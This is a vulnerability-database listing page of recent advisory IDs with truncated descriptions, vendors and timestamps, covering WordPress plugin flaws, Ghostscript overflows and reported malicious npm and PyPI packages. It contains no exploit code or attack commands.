Recent vulnerabilities


Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ghsa-xpv6-mc85-j28m The Booknetic WordPress plugin before 4.1.5 does not have CSRF check when creating Staff accounts, … 2025-03-26T06:31:37Z 2025-03-26T06:31:37Z
ghsa-v2rr-fhv8-mx74 The wp-svg-upload WordPress plugin through 1.0.0 does not sanitize SVG file contents, which enables… 2025-03-26T06:31:37Z 2025-03-26T06:31:37Z
ghsa-q67g-j9gg-987x httpd.c in atophttpd 2.8.0 has an off-by-one error and resultant out-of-bounds read because a certa… 2025-03-26T06:31:37Z 2025-03-26T06:31:37Z
ghsa-hm92-73j4-xqph The Spectra – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Sc… 2025-03-26T06:31:37Z 2025-03-26T06:31:37Z
ghsa-g2mr-q8jv-5635 The Smart Maintenance Mode WordPress plugin before 1.5.2 does not sanitise and escape some of its s… 2025-03-26T06:31:37Z 2025-03-26T06:31:37Z
ghsa-4qc5-44w7-j7v6 The Amazing service box Addons For WPBakery Page Builder (formerly Visual Composer) plugin for Word… 2025-03-26T03:30:32Z 2025-03-26T03:30:32Z
ghsa-x7r8-3f2q-rqcm The SH Email Alert plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'mi… 2025-03-26T03:30:31Z 2025-03-26T03:30:31Z
ghsa-phff-vmx4-52wr The Smart Maintenance Mode plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via… 2025-03-26T03:30:31Z 2025-03-26T03:30:31Z
ghsa-mq3c-vx29-2hc4 The Ayyash Studio — The kick-start kit plugin for WordPress is vulnerable to Stored Cross-Site Scri… 2025-03-26T03:30:31Z 2025-03-26T03:30:31Z
ghsa-mvf6-hwxh-7v76 Information leakage in YAQL 2024-03-18T09:30:30Z 2025-03-26T00:43:59Z
ghsa-m3gv-vg93-m632 The Advanced Woo Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the p… 2025-03-26T00:31:19Z 2025-03-26T00:31:19Z
ghsa-cfhx-3wmq-q5rg A vulnerability was found in Pagure. An argument injection in Git during retrieval of the repositor… 2025-03-26T00:31:19Z 2025-03-26T00:31:19Z
ghsa-2phh-fpc3-4x9w The Ultimate Dashboard – Custom WordPress Dashboard plugin for WordPress is vulnerable to unauthori… 2025-03-26T00:31:19Z 2025-03-26T00:31:19Z
ghsa-v3vp-fg2v-g7q4 OpenDaylight SFC Denial of Service (DoS) 2025-03-24T21:30:34Z 2025-03-25T22:06:10Z
ghsa-5565-3c98-g6jc WildFly Elytron OpenID Connect Client ExtensionOIDC authorization code injection attack 2025-03-25T21:49:11Z 2025-03-25T21:49:11Z
ghsa-4v5x-9m47-cqr2 Duplicate Advisory: WildFly Elytron OpenID Connect Client Extension authorization code injection attack 2024-12-09T21:31:02Z 2025-03-25T21:48:41Z
ghsa-rj7m-2p3g-fjxg create-choo-app3 is vulnerable to Command Injection via the devInstall function 2023-02-06T06:30:25Z 2025-03-25T21:48:03Z
ghsa-8h3g-hcwp-6hxq semver-tags is vulnerable to Command Injection via the getGitTagsRemote function 2023-02-06T06:30:25Z 2025-03-25T21:46:36Z
ghsa-x74r-f89v-3jw9 An issue was discovered in Artifex Ghostscript before 10.05.0. The DOCXWRITE TXTWRITE device has a … 2025-03-25T21:31:34Z 2025-03-25T21:31:34Z
ghsa-rmm8-wf49-vvww An issue was discovered in Artifex Ghostscript before 10.05.0. Access to arbitrary files can occur … 2025-03-25T21:31:34Z 2025-03-25T21:31:34Z
ghsa-gj36-hrrj-wvg8 An issue was discovered in Artifex Ghostscript before 10.05.0. A buffer overflow occurs when conver… 2025-03-25T21:31:34Z 2025-03-25T21:31:34Z
ghsa-96p6-38w3-wjpv An issue was discovered in Artifex Ghostscript before 10.05.0. The BJ10V device has a Print buffer … 2025-03-25T21:31:34Z 2025-03-25T21:31:34Z
ghsa-7287-grhx-542x Pixelfed before 0.12.5 allows anyone to follow private accounts and see private posts on other Fedi… 2025-03-25T21:31:34Z 2025-03-25T21:31:34Z
ghsa-674w-jwj3-6mv7 NASA cFS (Core Flight System) Aquila is vulnerable to segmentation fault via sending a malicious te… 2025-03-25T21:31:34Z 2025-03-25T21:31:34Z
ghsa-62q7-445r-42wh An issue was discovered in Artifex Ghostscript before 10.05.0. A buffer overflow occurs via an over… 2025-03-25T21:31:34Z 2025-03-25T21:31:34Z
ghsa-5fxv-x2j7-rmwm An issue was discovered in Artifex Ghostscript before 10.05.0. A buffer overflow occurs during seri… 2025-03-25T21:31:34Z 2025-03-25T21:31:34Z
ghsa-52fg-w63x-36xq An issue was discovered in Artifex Ghostscript before 10.05.0. The NPDL device has a Compression bu… 2025-03-25T21:31:34Z 2025-03-25T21:31:34Z
ghsa-4q6p-vw5p-724c An issue was discovered in Artifex Ghostscript before 10.05.0. A buffer overflow occurs for a long … 2025-03-25T21:31:34Z 2025-03-25T21:31:34Z
ghsa-xxp6-fq36-p8jx Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability … 2025-03-25T21:31:33Z 2025-03-25T21:31:33Z
ghsa-qvq7-g7xm-xr5h An issue was discovered on the Forvia Hella HELLA Driving Recorder DR 820. Managing Settings and Ob… 2025-03-18T15:30:49Z 2025-03-25T21:31:33Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2024-13702 CRM and Lead Management by vcita <= 2.7.4 - Authentica… vcita
CRM and Lead Management by vcita
2025-03-26T08:21:52.086Z 2025-03-26T08:21:52.086Z
cve-2024-13801 BWL Advanced FAQ Manager <= 2.1.4 - Missing Authorizat… xenioushk
BWL Advanced FAQ Manager
2025-03-26T08:21:51.722Z 2025-03-26T08:21:51.722Z
cve-2025-1514 Active Products Tables for WooCommerce <= 1.0.6.7 - U… realmag777
Active Products Tables for WooCommerce. Use constructor to create tables
2025-03-26T08:21:51.303Z 2025-03-26T08:21:51.303Z
cve-2025-2009 Newsletters <= 4.9.9.7 - Unauthenticated Stored Cross-… contrid
Newsletters
2025-03-26T08:21:50.914Z 2025-03-26T08:21:50.914Z
cve-2025-2167 Event post <= 5.9.9 - Authenticated (Contributor+) Sto… bastho
Event post
2025-03-26T08:21:50.518Z 2025-03-26T08:21:50.518Z
cve-2025-2257 Total Upkeep – WordPress Backup Plugin plus Restore & … boldgrid
Total Upkeep – WordPress Backup Plugin plus Restore & Migrate by BoldGrid
2025-03-26T08:21:49.944Z 2025-03-26T08:21:49.944Z
cve-2024-30155 5.5 (v3.1) HCL SX is susceptible to cookie with Insecure, Imprope… HCL Software
HCL SX
2025-03-26T07:59:52.442Z 2025-03-26T07:59:52.442Z
cve-2023-52972 5.5 (v3.1) Huawei PCs have a vulnerability that allows low-p… Huawei
YutuFZ-5651S1
2025-03-26T06:39:03.010Z 2025-03-26T06:39:03.010Z
cve-2024-13146 N/A Booknetic < 4.1.5 - Staff Creation via CSRF Unknown
Booknetic
2025-03-26T06:00:08.756Z 2025-03-26T06:00:08.756Z
cve-2024-12683 N/A Smart Maintenance Mode < 1.5.2 - Admin+ Stored XSS Unknown
Smart Maintenance Mode
2025-03-26T06:00:06.140Z 2025-03-26T06:00:06.140Z
cve-2024-11847 N/A WP SVG Upload <= 1.0.0 - Author+ Stored XSS via SVG Unknown
wp-svg-upload
2025-03-26T06:00:02.270Z 2025-03-26T06:00:02.270Z
cve-2024-27185 N/A [20240802] - Core - Cache Poisoning in Pagination Joomla! Project
Joomla! CMS
2024-08-20T16:03:58.015Z 2025-03-26T05:40:55.443Z
cve-2025-1784 Spectra – WordPress Gutenberg Blocks <= 2.19.0 - Authe… brainstormforce
Spectra – WordPress Gutenberg Blocks
2025-03-26T05:22:53.484Z 2025-03-26T05:22:53.484Z
cve-2024-1013 7.8 (v3.1) Unixodbc: out of bounds stack write due to pointer-to-… Red Hat
Red Hat Enterprise Linux 6
2024-03-18T10:53:02.506Z 2025-03-26T04:56:32.152Z
cve-2025-30742 httpd.c in atophttpd 2.8.0 has an off-by-one erro… pizhenwei
atophttpd
2025-03-26T00:00:00.000Z 2025-03-26T04:54:10.019Z
cve-2024-1725 6.5 (v3.1) Kubevirt-csi: persistentvolume allows access to hcp's …

2024-03-07T20:09:11.616Z 2025-03-26T04:52:26.156Z
cve-2024-26279 N/A [20240704] - Core - XSS in Wrapper extensions Joomla! Project
Joomla! CMS
2024-07-09T16:15:48.485Z 2025-03-26T04:34:05.778Z
cve-2024-21729 N/A [20240701] - Core - XSS in accessible media selection field Joomla! Project
Joomla! CMS
2024-07-09T16:15:51.461Z 2025-03-26T04:33:56.179Z
cve-2024-10033 6.1 (v3.1) Aap-gateway: xss on aap-gateway

2024-10-16T16:59:43.968Z 2025-03-26T04:19:11.949Z
cve-2024-58104 7.3 (v3.1) A vulnerability in the Trend Micro Apex One Secu… Trend Micro, Inc.
Trend Micro Apex One
2025-03-25T17:37:28.783Z 2025-03-26T03:55:25.056Z
cve-2024-58105 7.3 (v3.1) A vulnerability in the Trend Micro Apex One Secu… Trend Micro, Inc.
Trend Micro Apex One
2025-03-25T17:37:39.464Z 2025-03-26T03:55:23.754Z
cve-2025-29927 Authorization Bypass in Next.js Middleware vercel
next.js
2025-03-21T14:34:49.570Z 2025-03-26T03:55:22.466Z
cve-2025-0927 7.8 (v3.1) HFS+ filesystem heap overflow Canonical
Ubuntu Linux
2025-03-23T15:00:47.770Z 2025-03-26T03:55:20.806Z
cve-2025-1490 Smart Maintenance Mode <= 1.5.2 - Reflected Cross-Site… brijeshk89
Smart Maintenance Mode
2025-03-26T02:23:49.553Z 2025-03-26T02:23:49.553Z
cve-2025-2165 SH Email Alert <= 1.0 - Reflected Cross-Site Scripting samhoamt
SH Email Alert
2025-03-26T02:23:49.139Z 2025-03-26T02:23:49.139Z
cve-2025-2573 Amazing service box Addons For WPBakery Page Builder <… zia420
Amazing service box Addons For WPBakery Page Builder (formerly Visual Composer)
2025-03-26T02:23:48.765Z 2025-03-26T02:23:48.765Z
cve-2025-2576 Ayyash Studio <= 1.0.3 - Authenticated (Author+) Store… themerox
Ayyash Studio — The kick-start kit
2025-03-26T02:23:48.216Z 2025-03-26T02:23:48.216Z
cve-2025-1828 N/A Perl's Crypt::Random module after 1.05 and before 1.56… perl
Crypt::Random
2025-03-10T23:51:33.279Z 2025-03-26T01:33:42.709Z
cve-2025-2276 Ultimate Dashboard <= 3.8.7 - Missing Authorization to… davidvongries
Ultimate Dashboard – Custom WordPress Dashboard
2025-03-25T23:22:00.604Z 2025-03-25T23:22:00.604Z
cve-2025-2302 Advanced Woo Search <= 3.28 - Authenticated (Contribut… mihail-barinov
Advanced Woo Search
2025-03-25T23:21:55.903Z 2025-03-25T23:21:55.903Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2025-2257 Total Upkeep – WordPress Backup Plugin plus Restore & … boldgrid
Total Upkeep – WordPress Backup Plugin plus Restore & Migrate by BoldGrid
2025-03-26T08:21:49.944Z 2025-03-26T08:21:49.944Z
cve-2025-2167 Event post <= 5.9.9 - Authenticated (Contributor+) Sto… bastho
Event post
2025-03-26T08:21:50.518Z 2025-03-26T08:21:50.518Z
cve-2025-2009 Newsletters <= 4.9.9.7 - Unauthenticated Stored Cross-… contrid
Newsletters
2025-03-26T08:21:50.914Z 2025-03-26T08:21:50.914Z
cve-2025-1514 Active Products Tables for WooCommerce <= 1.0.6.7 - U… realmag777
Active Products Tables for WooCommerce. Use constructor to create tables
2025-03-26T08:21:51.303Z 2025-03-26T08:21:51.303Z
cve-2024-13801 BWL Advanced FAQ Manager <= 2.1.4 - Missing Authorizat… xenioushk
BWL Advanced FAQ Manager
2025-03-26T08:21:51.722Z 2025-03-26T08:21:51.722Z
cve-2024-13702 CRM and Lead Management by vcita <= 2.7.4 - Authentica… vcita
CRM and Lead Management by vcita
2025-03-26T08:21:52.086Z 2025-03-26T08:21:52.086Z
cve-2024-30155 5.5 (v3.1) HCL SX is susceptible to cookie with Insecure, Imprope… HCL Software
HCL SX
2025-03-26T07:59:52.442Z 2025-03-26T07:59:52.442Z
cve-2023-52972 5.5 (v3.1) Huawei PCs have a vulnerability that allows low-p… Huawei
YutuFZ-5651S1
2025-03-26T06:39:03.010Z 2025-03-26T06:39:03.010Z
cve-2025-1784 Spectra – WordPress Gutenberg Blocks <= 2.19.0 - Authe… brainstormforce
Spectra – WordPress Gutenberg Blocks
2025-03-26T05:22:53.484Z 2025-03-26T05:22:53.484Z
cve-2024-13146 N/A Booknetic < 4.1.5 - Staff Creation via CSRF Unknown
Booknetic
2025-03-26T06:00:08.756Z 2025-03-26T06:00:08.756Z
cve-2024-12683 N/A Smart Maintenance Mode < 1.5.2 - Admin+ Stored XSS Unknown
Smart Maintenance Mode
2025-03-26T06:00:06.140Z 2025-03-26T06:00:06.140Z
cve-2024-11847 N/A WP SVG Upload <= 1.0.0 - Author+ Stored XSS via SVG Unknown
wp-svg-upload
2025-03-26T06:00:02.270Z 2025-03-26T06:00:02.270Z
cve-2025-30742 httpd.c in atophttpd 2.8.0 has an off-by-one erro… pizhenwei
atophttpd
2025-03-26T00:00:00.000Z 2025-03-26T04:54:10.019Z
cve-2024-1725 6.5 (v3.1) Kubevirt-csi: persistentvolume allows access to hcp's …

2024-03-07T20:09:11.616Z 2025-03-26T04:52:26.156Z
cve-2024-1013 7.8 (v3.1) Unixodbc: out of bounds stack write due to pointer-to-… Red Hat
Red Hat Enterprise Linux 6
2024-03-18T10:53:02.506Z 2025-03-26T04:56:32.152Z
cve-2024-10033 6.1 (v3.1) Aap-gateway: xss on aap-gateway

2024-10-16T16:59:43.968Z 2025-03-26T04:19:11.949Z
cve-2025-2576 Ayyash Studio <= 1.0.3 - Authenticated (Author+) Store… themerox
Ayyash Studio — The kick-start kit
2025-03-26T02:23:48.216Z 2025-03-26T02:23:48.216Z
cve-2025-2573 Amazing service box Addons For WPBakery Page Builder <… zia420
Amazing service box Addons For WPBakery Page Builder (formerly Visual Composer)
2025-03-26T02:23:48.765Z 2025-03-26T02:23:48.765Z
cve-2025-2165 SH Email Alert <= 1.0 - Reflected Cross-Site Scripting samhoamt
SH Email Alert
2025-03-26T02:23:49.139Z 2025-03-26T02:23:49.139Z
cve-2025-1490 Smart Maintenance Mode <= 1.5.2 - Reflected Cross-Site… brijeshk89
Smart Maintenance Mode
2025-03-26T02:23:49.553Z 2025-03-26T02:23:49.553Z
cve-2025-1828 N/A Perl's Crypt::Random module after 1.05 and before 1.56… perl
Crypt::Random
2025-03-10T23:51:33.279Z 2025-03-26T01:33:42.709Z
cve-2025-2302 Advanced Woo Search <= 3.28 - Authenticated (Contribut… mihail-barinov
Advanced Woo Search
2025-03-25T23:21:55.903Z 2025-03-25T23:21:55.903Z
cve-2025-2276 Ultimate Dashboard <= 3.8.7 - Missing Authorization to… davidvongries
Ultimate Dashboard – Custom WordPress Dashboard
2025-03-25T23:22:00.604Z 2025-03-25T23:22:00.604Z
cve-2024-47516 9.8 (v3.1) Pagure: argument injection in pagurerepo.log()

2025-03-25T23:21:52.492Z 2025-03-25T23:21:52.492Z
cve-2025-30222 Shescape has potential environment variable exposure o… ericcornelissen
shescape
2025-03-25T23:00:08.995Z 2025-03-25T23:00:08.995Z
cve-2025-30219 RabbitMQ has XSS Vulnerability in an Error Message in … rabbitmq
rabbitmq-server
2025-03-25T22:55:35.539Z 2025-03-25T22:55:35.539Z
cve-2025-30741 Pixelfed before 0.12.5 allows anyone to follow pr… Pixelfed
Pixelfed
2025-03-25T00:00:00.000Z 2025-03-25T20:57:41.881Z
cve-2025-29789 OpenEMR Has Directory Traversal in Load Code feature openemr
openemr
2025-03-25T20:29:29.892Z 2025-03-25T20:39:41.939Z
cve-2025-27837 N/A An issue was discovered in Artifex Ghostscript be… n/a
n/a
2025-03-25T00:00:00.000Z 2025-03-25T20:31:34.931Z
cve-2025-27836 N/A An issue was discovered in Artifex Ghostscript be… n/a
n/a
2025-03-25T00:00:00.000Z 2025-03-25T20:22:06.228Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
fkie_cve-2024-30155 HCL SX does not set the secure attribute on authorization tokens or session cookies. Attackers may … 2025-03-26T08:15:12.657 2025-03-26T08:15:12.657
fkie_cve-2023-52972 Huawei PCs have a vulnerability that allows low-privilege users to bypass SDDL permission checks . … 2025-03-26T07:15:36.267 2025-03-26T07:15:36.267
fkie_cve-2025-1784 The Spectra – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Sc… 2025-03-26T06:15:28.557 2025-03-26T06:15:28.557
fkie_cve-2024-13146 The Booknetic WordPress plugin before 4.1.5 does not have CSRF check when creating Staff accounts, … 2025-03-26T06:15:28.330 2025-03-26T06:15:28.330
fkie_cve-2024-12683 The Smart Maintenance Mode WordPress plugin before 1.5.2 does not sanitise and escape some of its s… 2025-03-26T06:15:28.230 2025-03-26T06:15:28.230
fkie_cve-2024-11847 The wp-svg-upload WordPress plugin through 1.0.0 does not sanitize SVG file contents, which enables… 2025-03-26T06:15:28.000 2025-03-26T06:15:28.000
fkie_cve-2025-30742 httpd.c in atophttpd 2.8.0 has an off-by-one error and resultant out-of-bounds read because a certa… 2025-03-26T04:15:23.403 2025-03-26T05:15:40.593
fkie_cve-2024-1725 A flaw was found in the kubevirt-csi component of OpenShift Virtualization's Hosted Control Plane (… 2024-03-07T20:15:50.690 2025-03-26T05:15:40.107
fkie_cve-2024-1013 An out-of-bounds stack write flaw was found in unixODBC on 64-bit architectures where the caller ha… 2024-03-18T11:15:09.227 2025-03-26T05:15:39.920
fkie_cve-2024-10033 A vulnerability was found in aap-gateway. A Cross-site Scripting (XSS) vulnerability exists in the … 2024-10-16T17:15:13.267 2025-03-26T05:15:39.593
fkie_cve-2025-2576 The Ayyash Studio — The kick-start kit plugin for WordPress is vulnerable to Stored Cross-Site Scri… 2025-03-26T03:15:13.213 2025-03-26T03:15:13.213
fkie_cve-2025-2573 The Amazing service box Addons For WPBakery Page Builder (formerly Visual Composer) plugin for Word… 2025-03-26T03:15:13.033 2025-03-26T03:15:13.033
fkie_cve-2025-2165 The SH Email Alert plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'mi… 2025-03-26T03:15:12.853 2025-03-26T03:15:12.853
fkie_cve-2025-1490 The Smart Maintenance Mode plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via… 2025-03-26T03:15:12.257 2025-03-26T03:15:12.257
fkie_cve-2025-1828 Crypt::Random Perl package 1.05 through 1.55 may use rand() function, which is not cryptographicall… 2025-03-11T00:15:11.060 2025-03-26T02:15:25.633
fkie_cve-2025-2302 The Advanced Woo Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the p… 2025-03-26T00:15:13.593 2025-03-26T00:15:13.593
fkie_cve-2025-2276 The Ultimate Dashboard – Custom WordPress Dashboard plugin for WordPress is vulnerable to unauthori… 2025-03-26T00:15:13.440 2025-03-26T00:15:13.440
fkie_cve-2024-47516 A vulnerability was found in Pagure. An argument injection in Git during retrieval of the repositor… 2025-03-26T00:15:13.270 2025-03-26T00:15:13.270
fkie_cve-2025-30222 Shescape is a simple shell escape library for JavaScript. Versions 1.7.2 through 2.1.1 are vulnerab… 2025-03-25T23:15:36.707 2025-03-25T23:15:36.707
fkie_cve-2025-30219 RabbitMQ is a messaging and streaming broker. Versions prior to 4.0.3 are vulnerable to a sophistic… 2025-03-25T23:15:36.560 2025-03-25T23:15:36.560
fkie_cve-2025-30741 Pixelfed before 0.12.5 allows anyone to follow private accounts and see private posts on other Fedi… 2025-03-25T21:15:43.527 2025-03-25T21:15:43.527
fkie_cve-2025-29789 OpenEMR is a free and open source electronic health records and medical practice management applica… 2025-03-25T21:15:43.363 2025-03-25T21:15:43.363
fkie_cve-2025-27837 An issue was discovered in Artifex Ghostscript before 10.05.0. Access to arbitrary files can occur … 2025-03-25T21:15:43.250 2025-03-25T21:15:43.250
fkie_cve-2025-27836 An issue was discovered in Artifex Ghostscript before 10.05.0. The BJ10V device has a Print buffer … 2025-03-25T21:15:43.137 2025-03-25T21:15:43.137
fkie_cve-2025-27835 An issue was discovered in Artifex Ghostscript before 10.05.0. A buffer overflow occurs when conver… 2025-03-25T21:15:43.013 2025-03-25T21:15:43.013
fkie_cve-2025-27834 An issue was discovered in Artifex Ghostscript before 10.05.0. A buffer overflow occurs via an over… 2025-03-25T21:15:42.870 2025-03-25T21:15:42.870
fkie_cve-2025-27833 An issue was discovered in Artifex Ghostscript before 10.05.0. A buffer overflow occurs for a long … 2025-03-25T21:15:42.683 2025-03-25T21:15:42.683
fkie_cve-2025-27832 An issue was discovered in Artifex Ghostscript before 10.05.0. The NPDL device has a Compression bu… 2025-03-25T21:15:42.570 2025-03-25T21:15:42.570
fkie_cve-2025-27831 An issue was discovered in Artifex Ghostscript before 10.05.0. The DOCXWRITE TXTWRITE device has a … 2025-03-25T21:15:42.467 2025-03-25T21:15:42.467
fkie_cve-2025-27830 An issue was discovered in Artifex Ghostscript before 10.05.0. A buffer overflow occurs during seri… 2025-03-25T21:15:42.353 2025-03-25T21:15:42.353
Vulnerabilities are sorted by update time (recent to old).
ID Description Package Published Updated
pysec-2024-85 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD… mindsdb 2024-09-12T13:15:00Z 2025-03-24T09:35:34.901896Z
pysec-2024-84 Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsD… mindsdb 2024-09-12T13:15:00Z 2025-03-24T09:35:34.820818Z
pysec-2024-83 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD… mindsdb 2024-09-12T13:15:00Z 2025-03-24T09:35:34.745851Z
pysec-2024-82 Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB… mindsdb 2024-09-12T13:15:00Z 2025-03-24T09:35:34.668200Z
pysec-2023-278 MindsDB connects artificial intelligence models to real time data. Versions prior to 23.1… mindsdb 2023-12-11T21:15:00Z 2025-03-24T09:35:34.555018Z
pysec-2025-9 A remote code execution vulnerability exists in invoke-ai/invokeai versions 5.3.1 through… invokeai 2025-03-20T10:15:26+00:00 2025-03-20T11:21:37.872971+00:00
pysec-2024-111 A path traversal vulnerability exists in the `getFullPath` method of langchain-ai/langcha… langchain 2024-10-29T13:15:00Z 2025-03-18T21:03:37.898513Z
pysec-2025-8 The `pygments-style-solarized` project was removed from PyPI by its owner on 2021-08-26. … pygments-style-solarized 2025-03-17T16:35:37+00:00
pysec-2024-237 OctoPrint provides a web interface for controlling consumer 3D printers. OctoPrint versio… octoprint 2024-05-14T16:17:12+00:00 2025-03-05T17:22:29.121263+00:00
pysec-2024-236 Jupyter Server Proxy allows users to run arbitrary external processes alongside their not… jupyter-server-proxy 2024-06-11T22:15:09+00:00 2025-02-26T23:22:41.524251+00:00
pysec-2025-7 Published in 2021, the imblog package is a Python library that scrapes data from a blog p… imblog 2025-02-26T21:19:19+00:00
pysec-2025-6 Published in 2021, the colabrun package is a Python library that exfiltrates user cookies… colabrun 2025-02-26T20:59:48+00:00
pysec-2025-5 Published in 2020, the autodzee package is a Python library that bypasses Deezer API rest… browsercmdhbt2 2025-02-26T20:57:11+00:00
pysec-2025-3 Published in 2019, the autodzee package is a Python library that bypasses Deezer API rest… autodzee 2025-02-26T20:54:20+00:00
pysec-2025-4 Published in 2019, the automslc package is a Python library that bypasses Deezer API rest… automslc 2025-02-26T19:26:49+00:00
pysec-2024-235 With the following crawler configuration: ```python from bs4 import BeautifulSoup as Sou… langchain-exa 2024-02-26T16:27:49+00:00 2025-02-26T02:48:56.937312+00:00
pysec-2023-194 langchain_experimental 0.0.14 allows an attacker to bypass the CVE-2023-36258 fix and exe… langchain-experimental 2023-10-09T20:15:00Z 2025-02-23T07:46:11Z
pysec-2024-234 Jupyter Server Proxy allows users to run arbitrary external processes alongside their Jup… jupyter-server-proxy 2024-03-20T20:15:08+00:00 2025-02-21T18:23:35.992501+00:00
pysec-2023-163 An issue in LanChain-ai Langchain v.0.0.245 allows a remote attacker to execute arbitrary… numexpr 2023-09-01T16:15:00Z 2025-02-20T09:11:38.521949Z
pysec-2024-233 python-jose through 3.3.0 allows attackers to cause a denial of service (resource consump… python-jose 2024-04-26T00:15:09+00:00 2025-02-18T19:20:15.511369+00:00
pysec-2024-232 python-jose through 3.3.0 has algorithm confusion with OpenSSH ECDSA keys and other key f… python-jose 2024-04-26T00:15:09+00:00 2025-02-18T19:20:15.468012+00:00
pysec-2024-231 LightGBM Remote Code Execution Vulnerability lightgbm 2024-11-12T18:15:28+00:00 2025-02-15T07:20:34.246161+00:00
pysec-2024-230 Certifi is a curated collection of Root Certificates for validating the trustworthiness o… certifi 2024-07-05T19:15:10+00:00 2025-02-12T21:21:51.559667+00:00
pysec-2024-229 Hugging Face Transformers Trax Model Deserialization of Untrusted Data Remote Code Execut… transformers 2024-11-22T22:15:07+00:00 2025-02-10T23:22:41.499413+00:00
pysec-2024-228 Hugging Face Transformers MaskFormer Model Deserialization of Untrusted Data Remote Code … transformers 2024-11-22T22:15:07+00:00 2025-02-10T23:22:41.449105+00:00
pysec-2024-227 Hugging Face Transformers MobileViTV2 Deserialization of Untrusted Data Remote Code Execu… transformers 2024-11-22T22:15:06+00:00 2025-02-10T23:22:41.399021+00:00
pysec-2024-226 Pymatgen (Python Materials Genomics) is an open-source Python library for materials analy… pymatgen 2024-02-21T17:15:09+00:00 2025-02-06T00:34:28.734730+00:00
pysec-2024-225 cryptography is a package designed to expose cryptographic primitives and recipes to Pyth… cryptography 2024-02-21T17:15:09+00:00 2025-02-06T00:34:24.427679+00:00
pysec-2024-224 Excessive directory permissions in MLflow leads to local privilege escalation when using … mlflow 2024-11-25T14:15:06+00:00 2025-02-03T16:23:40.409646+00:00
pysec-2024-27 CrateDB 5.5.1 is contains an authentication bypass vulnerability in the Admin UI componen… crate 2024-01-30T01:15:00Z 2025-01-30T22:47:57.847403Z
Vulnerabilities are sorted by update time (recent to old).
ID Description
gsd-2024-33884 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33901 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33887 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33895 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33894 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33902 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33888 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33885 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33891 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33899 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33889 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33893 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33892 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33890 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33896 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33903 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33900 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33898 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33886 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33897 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33883 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4303 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4300 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4297 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4301 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4296 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4299 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4302 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4298 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33876 The format of the source doesn't require a description, click on the link for more details
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
mal-2024-11205 Malicious code in @wix-platform/velo-multilingual-helper-backend (npm) 2024-12-05T12:37:46Z 2024-12-05T12:37:46Z
mal-2024-11204 Malicious code in cdp-agentkit-core (npm) 2024-12-05T10:35:51Z 2024-12-05T10:35:51Z
mal-2024-7895 Malicious code in lit-3 (npm) 2024-08-05T18:53:26Z 2024-12-05T09:06:36Z
mal-2024-11203 Malicious code in finn-pulse-init (npm) 2024-12-05T07:58:04Z 2024-12-05T08:07:42Z
mal-2024-11202 Malicious code in buoyant-utils (npm) 2024-12-05T05:57:35Z 2024-12-05T05:57:35Z
mal-2024-11201 Malicious code in coldbox (npm) 2024-12-05T04:54:20Z 2024-12-05T05:06:49Z
mal-2024-11200 Malicious code in quintoandar-jwt (npm) 2024-12-05T00:55:28Z 2024-12-05T00:55:28Z
mal-2024-10914 Malicious code in veworld-mock (npm) 2024-11-24T20:43:19Z 2024-12-05T00:35:15Z
mal-2024-10912 Malicious code in quorumnetworktester (npm) 2024-11-24T18:53:52Z 2024-12-05T00:35:15Z
mal-2024-10911 Malicious code in plaid-tiny-quickstart (npm) 2024-11-24T16:15:48Z 2024-12-05T00:35:15Z
mal-2024-10572 Malicious code in xcasset-gen (npm) 2024-11-08T12:05:36Z 2024-12-05T00:35:15Z
mal-2024-10570 Malicious code in spliffy-benchmark (npm) 2024-11-08T13:58:58Z 2024-12-05T00:35:15Z
mal-2024-10569 Malicious code in quill-icons-park (npm) 2024-11-08T12:25:57Z 2024-12-05T00:35:15Z
mal-2024-10566 Malicious code in pixiv-novel-editor (npm) 2024-11-08T12:13:43Z 2024-12-05T00:35:15Z
mal-2024-10534 Malicious code in sinbad-dev (npm) 2024-11-08T11:45:22Z 2024-12-05T00:35:15Z
mal-2024-2055 Malicious code in d11-foo (npm) 2024-06-25T12:35:11Z 2024-12-05T00:35:14Z
